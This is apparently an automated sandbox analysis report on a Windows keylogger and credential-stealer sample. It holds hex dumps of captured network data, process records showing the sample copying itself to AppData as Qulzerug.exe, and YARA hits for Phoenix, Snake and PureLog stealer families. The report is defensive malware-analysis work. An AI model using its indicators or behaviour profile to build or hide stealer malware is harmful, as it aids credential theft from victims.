                      2024-07-03 14:17:19 UTC1369INData Raw: 92 4d 51 a0 a0 fd a6 46 15 63 f2 df 95 13 a8 1b ee 9e e9 98 e3 7d 55 a9 71 02 6e 81 8a c1 2e d5 20 2e 6d 37 4f 94 13 e1 01 a2 0b 8f dd 32 0a a8 9e 50 44 fb c0 fb 44 ce 95 85 d5 1d 6a 68 4f ae 94 bd eb b7 b1 29 cd ab a3 b9 75 1c 7e ef f1 06 9d 2b d4 6f d7 7d 58 7d bd 06 72 08 76 b6 2d 49 75 64 83 f7 ef 30 fe 8e d9 a0 22 31 d7 c0 5b 68 b8 35 68 9d ae 0f 37 e1 af b7 67 c6 dc a3 da dd 59 02 aa 45 87 af 18 8b 21 00 d1 00 8d 9d b7 4a 2e b0 47 c5 7b 5b b0 3b 33 29 50 63 34 1f 10 f6 d1 44 9d 40 53 98 92 80 7d f4 99 d2 ac 4d 91 e3 90 01 b0 f5 41 34 ab b4 6d 0b a0 2b 20 1f 62 2f a2 60 38 d5 2d b8 23 51 b3 05 e2 55 75 06 cb f7 b9 aa e7 e9 9b 9a e1 20 47 a5 e4 5c ea 0d 6b b1 1c 80 db 85 98 4c b7 2a f2 8d f7 c7 da f5 66 ed 20 3d 60 98 20 7c 87 a4 6b 98 29 10 d1 70 ea
                      Data Ascii: MQFc}Uqn. .m7O2PDDjhO)u~+o}X}rv-Iud0"1[h5h7gYE!J.G{[;3)Pc4D@S}MA4m+ b/`8-#QUu G\kL*f =` |k)p
                      2024-07-03 14:17:19 UTC1369INData Raw: 20 29 a2 f7 d4 8d bf 09 59 f5 20 1a e5 50 3a d5 3a 0c b0 22 b8 85 8f cc dd 55 13 69 56 ff cb 7c 1d d9 68 8f 77 d1 9b 01 d9 3a 25 92 9d ec a2 e6 c7 65 fb 3b 0c 22 2b 36 b3 f0 fb cc 82 04 62 61 b1 6a 9e ea 0a 83 a5 03 49 df 38 96 09 1a 25 af fe d9 b5 99 ca a7 3a c4 99 53 85 74 b0 af 77 41 66 15 48 76 aa 59 06 4e 75 e3 0e 79 7f 03 c6 e2 ab 86 8b 1c 5f 4e 99 00 60 b5 a5 60 03 bb 20 c8 95 77 e8 b8 00 50 21 d5 de 0d 63 6a a1 cd 7e 2b e5 a5 2d 99 50 ca fb 5c e9 41 8f 68 19 55 06 0d ad c8 07 c5 fd d6 9b 51 a9 09 90 c2 7e 95 ec 92 8b 84 43 f6 d6 7f a9 73 00 a8 a2 8b e9 93 66 93 e9 63 92 ac 42 04 75 45 fe dd ad b6 fe 88 6d ab 1e ff 3a ef 2f ae a3 1c 02 2f 82 67 8c a3 1b 78 c4 4b 88 2a 94 59 6b a7 44 5b df 82 77 0a e2 60 c0 25 cc 3f 41 0b 82 b9 18 c0 ce 1e f9 7e c5
                      Data Ascii: )Y P::"UiV|hw:%e;"+6bajI8%:StwAfHvYNuy_N`` wP!cj~+-P\AhUQ~CsfcBuEm://gxK*YkD[w`%?A~
                      2024-07-03 14:17:19 UTC1369INData Raw: 1d e5 c7 f2 43 22 99 b0 cf 27 b3 73 f1 ed 48 db b7 9b 8e be 96 bf c2 1d c1 19 34 c4 bc fa ce 03 8f c9 a3 bb 70 5e 8f 2e 3e 9e 05 da e8 7e 82 5a 14 6f 5f 43 1e e8 c4 9e 67 65 a9 1b dd 8b 3b ad 44 1c a7 4a 97 6e 40 90 65 2a bf 35 a5 cd bf fe 12 e4 ff 31 63 2d 94 da ac d6 77 c0 75 ac 68 bf 6d 2f d2 8f 16 cc 81 fc 6c c3 d3 95 36 c3 d7 aa 1f fe f3 cf e8 49 22 8c 86 c9 f0 82 5d 61 fc a5 7f 39 a3 49 4e 10 b6 1d ff 9f a2 54 2a 6c 29 79 c7 25 5c 7f 8d 68 e8 5e 98 a9 54 ab db 66 96 4a cd 64 35 53 6f db 40 60 04 82 44 d3 9e 3e fc 96 87 23 8e eb 4f 6b 5b 6e 44 48 1a ba 80 5a c8 68 04 a0 8e db a9 9b 5a 06 b0 eb da 61 5d 14 6a 47 1e 83 90 84 70 cf da 2e 61 fd 76 22 c7 93 93 96 39 33 bc 87 1e d4 7f a8 ba f9 42 34 fe 8d 23 7f 53 cc 54 36 59 e2 f4 c7 8e 35 cc 4f f3 19 83
                      Data Ascii: C"'sH4p^.>~Zo_Cge;DJn@e*51c-wuhm/l6I"]a9INT*l)y%\h^TfJd5So@`D>#Ok[nDHZhZa]jGp.av"93B4#ST6Y5O
                      2024-07-03 14:17:19 UTC1369INData Raw: 21 0c 81 08 5e 28 fe ce 27 c7 98 1c 9a 77 bc 7b 09 cb 41 b3 7b 01 6b 2d af 79 a3 96 71 02 e0 ac c0 04 e9 d5 46 81 e6 13 87 fb 62 7b 39 fd 09 3e 39 fe f4 65 97 59 0c c8 bc 51 5b 91 82 3f f1 9a d6 4d 59 8d 28 3e 46 c4 b9 4e b8 55 7d 97 db f0 5b 49 e0 15 9c ff 85 94 9a 7c 55 a1 80 fa 9f bb 74 9f ac de 22 99 95 db 22 fa d3 fc 5c d7 ec 38 17 ba d6 93 f4 8c 04 5c 13 b3 7c 2d df ea 9e c1 5a 9d 00 ac e8 07 b3 07 85 a6 84 00 ee 37 7a 00 27 16 9f 8a 0d 5e 29 6d 65 61 9f db 3c e1 95 1d 70 26 5b 9b 00 69 6b 22 1d 78 de bb 45 e2 6b a5 69 1b 62 6e ef 5f 88 fa 2e f1 ca 10 09 2f 4a 92 ca 90 c1 0d af f6 63 bd db b2 0e 98 6b 95 6f fd 8c 02 85 d3 4b 3b d8 17 31 c2 24 c4 a6 2c 1b 41 d1 d7 7a 65 59 61 08 06 8b fd 3e 9e e0 b5 3b 0c b7 59 00 e7 c4 e1 64 cb 5c 97 5c 0b ba 5b 78
                      Data Ascii: !^('w{A{k-yqFb{9>9eYQ[?MY(>FNU}[I|Ut""\8\|-Z7z'^)mea<p&[ik"xEkibn_./JckoK;1$,AzeYa>;Yd\\[x
                      2024-07-03 14:17:19 UTC1369INData Raw: 2a b4 ca 06 a0 ed 24 56 37 bf bb d0 06 38 44 66 b5 63 0f e3 5e 15 03 4f 32 6d 11 5e 7c 05 39 3a 3b 86 75 14 e8 23 2d e0 31 cb 0d b6 13 05 d3 fd 2e ec 2f 36 09 54 84 33 40 a0 7d d4 a3 78 5e 45 36 e1 7f 54 9d d9 d6 fa 3a 5e 4f 04 cf c3 d7 57 28 ee 84 66 5a 4a 26 3b 4c a9 32 fb 06 58 5a 7e c7 7d e7 81 01 b7 93 7e ca 7f 02 d7 38 cb de a3 c1 31 f7 e0 29 55 c3 b7 7c 4e 85 3f 05 92 b4 da 1d ff fe 89 b4 eb 2a 7b 1e 25 8b b1 a4 b9 f4 31 f0 2d 4e d3 b4 d3 40 97 eb 67 04 45 66 22 72 1e 93 cf c5 90 be 1d ae 9b 27 c3 b9 a5 14 f7 da 54 99 3a c1 08 71 81 ee ea a0 88 e3 e4 61 f3 ca dc b8 3f 3b 86 7b e0 9d 43 3d 18 04 d4 49 4a 02 3c fe 79 76 0e 52 35 bf 67 28 72 b6 50 57 b6 fe 9e df 23 bd 58 ae 1a 89 be 04 d7 8f e9 e9 59 ec a3 2d 8b 21 27 fa 17 75 b2 16 f2 21 85 14 c6 7c
                      Data Ascii: *$V78Dfc^O2m^|9:;u#-1./6T3@}x^E6T:^OW(fZJ&;L2XZ~}~81)U|N?*{%1-N@gEf"r'T:qa?;{C=IJ<yvR5g(rPW#XY-!'u!|
                      2024-07-03 14:17:19 UTC342INData Raw: 0a 68 d3 6a 71 cb 1c 25 34 a9 29 fd 35 27 6a 35 3e 4c 99 d2 18 49 f6 0f 43 18 d1 81 87 ce 0f 92 a3 f8 39 f3 c4 a7 d8 87 0a 78 be 32 54 9e 9b 5a 9e 09 38 66 bc d1 5a b0 f5 57 0a 72 6b 03 62 3b 53 eb e8 4d 62 a3 29 d8 34 8a c0 b4 d3 2e 71 62 b7 9e 30 cd 62 e7 51 da 22 36 4d 37 bb 91 54 05 69 44 2e 11 16 ed ee 6c 3b c9 18 cc 7b 25 93 e3 11 b8 8f 99 f4 43 cc 9c b7 8b 00 63 ec 6d d1 bd a2 62 b7 62 4c ce cc 5f 52 54 5f f9 b0 07 f0 55 ff 57 c0 0b 27 0e 3c d1 de 52 61 c2 7a bb 8e 53 26 69 cd 10 51 07 58 ea 4c fc bc 9a f7 d6 77 8d 8c aa 73 fc 67 37 24 3b 41 ed 25 19 99 09 86 10 a2 4a 43 e1 df 66 0b ed 3f dd 17 7a af b0 73 e2 1a 60 09 08 f8 e6 12 0a 2a 40 80 96 2e 2d 56 6e 7a 0d 8e f7 89 fc 7e 91 a1 82 9b df 74 47 e8 04 ca ee 00 ba 1f 4d 13 a1 a4 91 04 25 c2 45 ae
                      Data Ascii: hjq%4)5'j5>LIC9x2TZ8fZWrkb;SMb)4.qb0bQ"6M7TiD.l;{%CcmbbL_RT_UW'<RazS&iQXLwsg7$;A%JCf?zs`*@.-Vnz~tGM%E
                      2024-07-03 14:17:19 UTC1369INData Raw: 36 30 31 34 0d 0a 77 6d d1 71 6d 65 69 d0 98 f3 40 af 0b c9 d6 2e 2b 01 34 a5 88 7c 1b a0 aa d3 f9 0d 22 d1 8d dc 75 8e f8 4c ee c5 74 a0 8c 70 39 c0 93 6a 9b 2c 0a c5 f7 16 3d ca ca 96 0c c1 3c d7 74 1c 2e 1e 21 ec d7 0f 7e 28 4b 21 e5 aa 41 0d fd 27 2d 43 11 f1 6a 58 a8 f3 69 98 3e 97 40 b7 f5 ce 3c 4a dc 3e a0 61 65 26 04 15 00 0c 7d 9a 57 f4 eb 62 53 f1 e5 10 0b d2 89 f5 b2 a4 70 ee a2 6f b0 86 bf 9f a5 74 94 c3 d1 68 f8 7f 80 e6 00 cb c5 3e cd d7 e7 a9 51 99 6d 3c 9c 2e fe ce 39 38 c6 97 43 87 ce 96 71 97 66 a6 69 35 94 d5 ae 76 a7 50 ae 74 b1 5b c4 53 53 4b c2 fb aa 98 89 73 b4 5b 06 f7 e1 03 d9 a4 02 6d d0 b6 dc 81 ae 15 c0 49 6e 77 18 b5 e5 d5 ce b3 75 47 c4 b6 83 a0 4d cd e9 8d 7f f3 22 75 79 38 23 5c c7 dc 72 16 e8 a7 ec 1d 51 99 f8 b7 c7 bc 6d
                      Data Ascii: 6014wmqmei@.+4|"uLtp9j,=<t.!~(K!A'-CjXi>@<J>ae&}WbSpoth>Qm<.98Cqfi5vPt[SSKs[mInwuGM"uy8#\rQm
                      2024-07-03 14:17:19 UTC1369INData Raw: ca 5d 08 71 ba 25 4b ae 6a 33 a8 ff 1f 2e b1 85 52 c2 7a 88 31 11 03 11 76 ae 5b f4 45 c6 c8 60 6a 2f 87 e1 24 b1 4c 30 f6 25 20 55 aa f7 29 c5 43 60 53 53 c9 30 a9 bb 60 52 e8 0b af e8 50 34 d7 09 28 7f 37 c7 85 5c 07 91 89 01 ef 5d 5c 5d 1c ea 9e b9 49 ed 27 e8 67 17 23 49 cd e7 05 bb 96 0c b9 59 24 da d1 21 a2 58 67 40 c2 14 9a 07 69 13 ea 97 7d 37 fd 9c 9f c9 67 02 b5 c1 ed e2 c0 6a 01 08 7e 88 77 df 95 3d 39 27 0a af 22 ff 38 d7 46 68 92 2e 07 7b 44 60 68 5e cd b7 51 54 2a 30 e2 1a 63 f3 fe 65 0c ca 8e cd b3 da 38 57 a1 14 fb 48 b5 09 94 24 ab 4e 1d f5 2a 7c 6c 48 54 2a da 12 85 39 42 aa 0b 58 c9 c4 09 93 98 13 08 6b 4a ac bc 9a eb 2a a7 fe a6 6c b2 8e e9 56 8b bb 0e af 40 18 c8 aa a1 da 85 cd 99 ef 96 16 75 aa b3 56 0a 29 89 8c 6c e4 4d 0c c0 be 83
                      Data Ascii: ]q%Kj3.Rz1v[E`j/$L0% U)C`SS0`RP4(7\]\]I'g#IY$!Xg@i}7gj~w=9'"8Fh.{D`h^QT*0ce8WH$N*|lHT*9BXkJ*lV@uV)lM
                      2024-07-03 14:17:19 UTC1369INData Raw: 20 d6 96 a2 51 f8 c6 62 d0 b5 2e 41 b4 bc 1a 85 4a 92 a1 20 5c f6 0f 8d bf b4 b3 05 b2 c6 34 b1 83 fe ca 9b 1d d3 ad be 69 de f8 68 32 16 94 a2 db 3f 2a 3f 89 ae b5 29 0c d6 bb 1e 64 3a ee cd f3 96 c9 f4 6f 4c 2c d9 9b b8 50 82 5a a8 c1 0f 90 fd 96 27 55 3f ac fb c2 35 69 48 dd f0 fc 37 a2 62 4d 9a 45 c9 bd 0d bc a9 65 32 74 4e d5 aa 1b fa ab 42 ab 6c 4e 45 49 4d 05 85 c1 fa 24 a9 50 2e 0b 60 73 60 a9 26 ef df ab 02 e6 72 b9 00 33 f5 b1 f3 49 4e 97 58 ae 9f 5a aa d3 09 ee 25 2f 3d 12 ad 02 75 5b 93 d3 83 75 9d a9 1c 87 03 8c d3 6b f3 bf f7 53 36 73 d7 d9 3e 6e 10 63 12 10 d5 ac d4 c6 4c 58 8c 55 b2 b8 e7 d4 7e 94 bd 18 f2 7a b9 8e c9 9e dc af a9 e3 11 3f 31 67 4b 89 84 bd cf d6 02 f1 84 b1 03 e7 1c 50 02 f6 6d c5 9c ae da 3c 9f ca 6b 8b c8 46 4e 84 01 1d
                      Data Ascii: Qb.AJ \4ih2?*?)d:oL,PZ'U?5iH7bMEe2tNBlNEIM$P.`s`&r3INXZ%/=u[ukS6s>ncLXU~z?1gKPm<kFN


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:10:16:55
                      Start date:03/07/2024
                      Path:C:\Users\user\Desktop\6Ek4nfs2y1.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\6Ek4nfs2y1.exe"
                      Imagebase:0x590000
                      File size:9'728 bytes
                      MD5 hash:21CCB2CD9A4FBC259AB1110BC687B960
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1299183493.0000000005860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:8
                      Start time:10:16:59
                      Start date:03/07/2024
                      Path:C:\Users\user\Desktop\6Ek4nfs2y1.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\6Ek4nfs2y1.exe"
                      Imagebase:0xc10000
                      File size:9'728 bytes
                      MD5 hash:21CCB2CD9A4FBC259AB1110BC687B960
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:9
                      Start time:10:17:09
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Qulzerug.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\Qulzerug.exe"
                      Imagebase:0x830000
                      File size:9'728 bytes
                      MD5 hash:21CCB2CD9A4FBC259AB1110BC687B960
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1552321721.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1526328229.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 71%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:11
                      Start time:10:17:18
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Qulzerug.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\Qulzerug.exe"
                      Imagebase:0x2b0000
                      File size:9'728 bytes
                      MD5 hash:21CCB2CD9A4FBC259AB1110BC687B960
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      Target ID:12
                      Start time:10:17:21
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Qulzerug.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\Qulzerug.exe"
                      Imagebase:0xe80000
                      File size:9'728 bytes
                      MD5 hash:21CCB2CD9A4FBC259AB1110BC687B960
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000C.00000002.2495830056.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:13
                      Start time:10:17:21
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Qulzerug.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\Qulzerug.exe"
                      Imagebase:0xa00000
                      File size:9'728 bytes
                      MD5 hash:21CCB2CD9A4FBC259AB1110BC687B960
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.2495878153.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:false

                      Reset < >

                        Execution Graph

                        Execution Coverage:2.8%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 14319 282feb8 14320 282ff00 VirtualProtect 14319->14320 14322 282ff3b 14320->14322

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 225 84dda70-84dda98 226 84dda9f-84ddae1 225->226 227 84dda9a 225->227 228 84ddb68-84ddb6f 226->228 229 84ddae7-84ddb62 call 84ddef8 226->229 227->226 230 84ddd18-84ddd63 228->230 231 84ddb75-84ddbfa 228->231 229->228 241 84dddb8-84dde7f 230->241 242 84ddd65-84ddd7e 230->242 254 84ddc00-84ddc7c 231->254 255 84ddd12 231->255 258 84dde9e-84ddea4 241->258 242->241 248 84ddd80-84dddb3 242->248 248->258 271 84ddcdb-84ddce4 254->271 255->230 259 84ddeae 258->259 260 84ddea6 258->260 260->259 272 84ddc7e-84ddc87 271->272 273 84ddce6-84ddcea 271->273 276 84ddc8e-84ddcc6 272->276 277 84ddc89 272->277 273->255 275 84ddcec-84ddd07 273->275 275->255 283 84ddcd8 276->283 284 84ddcc8-84ddcd6 276->284 277->276 283->271 284->273
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 43fb03ea3ac40797db6fdd3afc566b7b795a17238cf475cf1392602808c80d4c
                        • Instruction ID: a25ea5cb5b4fa37eceb1bac61ea15cf997fa8d311d02b65dfb7e25041d882eeb
                        • Opcode Fuzzy Hash: 43fb03ea3ac40797db6fdd3afc566b7b795a17238cf475cf1392602808c80d4c
                        • Instruction Fuzzy Hash: FED19374E01618CFDB54DFA9D994B9DBBF2BF89300F2081AAD409AB365DB319981CF50

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 84def18-84def2a 1 84def2c-84def4d 0->1 2 84def54-84def58 0->2 1->2 3 84def5a-84def5c 2->3 4 84def64-84def73 2->4 3->4 5 84def7f-84defab 4->5 6 84def75 4->6 10 84df1d8-84df21f 5->10 11 84defb1-84defb7 5->11 6->5 42 84df235-84df241 10->42 43 84df221 10->43 12 84defbd-84defc3 11->12 13 84df089-84df08d 11->13 12->10 16 84defc9-84defd6 12->16 17 84df08f-84df098 13->17 18 84df0b0-84df0b9 13->18 19 84defdc-84defe5 16->19 20 84df068-84df071 16->20 17->10 21 84df09e-84df0ae 17->21 22 84df0de-84df0e1 18->22 23 84df0bb-84df0db 18->23 19->10 27 84defeb-84df003 19->27 20->10 26 84df077-84df083 20->26 25 84df0e4-84df0ea 21->25 22->25 23->22 25->10 29 84df0f0-84df103 25->29 26->12 26->13 30 84df00f-84df021 27->30 31 84df005 27->31 29->10 33 84df109-84df119 29->33 30->20 37 84df023-84df029 30->37 31->30 33->10 36 84df11f-84df12c 33->36 36->10 39 84df132-84df147 36->39 40 84df02b 37->40 41 84df035-84df03b 37->41 39->10 51 84df14d-84df170 39->51 40->41 41->10 44 84df041-84df065 41->44 47 84df24d-84df269 42->47 48 84df243 42->48 45 84df224-84df226 43->45 49 84df228-84df233 45->49 50 84df26a-84df297 45->50 48->47 49->42 49->45 61 84df2af-84df2b3 call 84df330 50->61 62 84df299-84df29f 50->62 51->10 57 84df172-84df17d 51->57 58 84df17f-84df189 57->58 59 84df1ce-84df1d5 57->59 58->59 66 84df18b-84df1a1 58->66 67 84df2b9-84df2bd 61->67 64 84df2a1 62->64 65 84df2a3-84df2a5 62->65 64->61 65->61 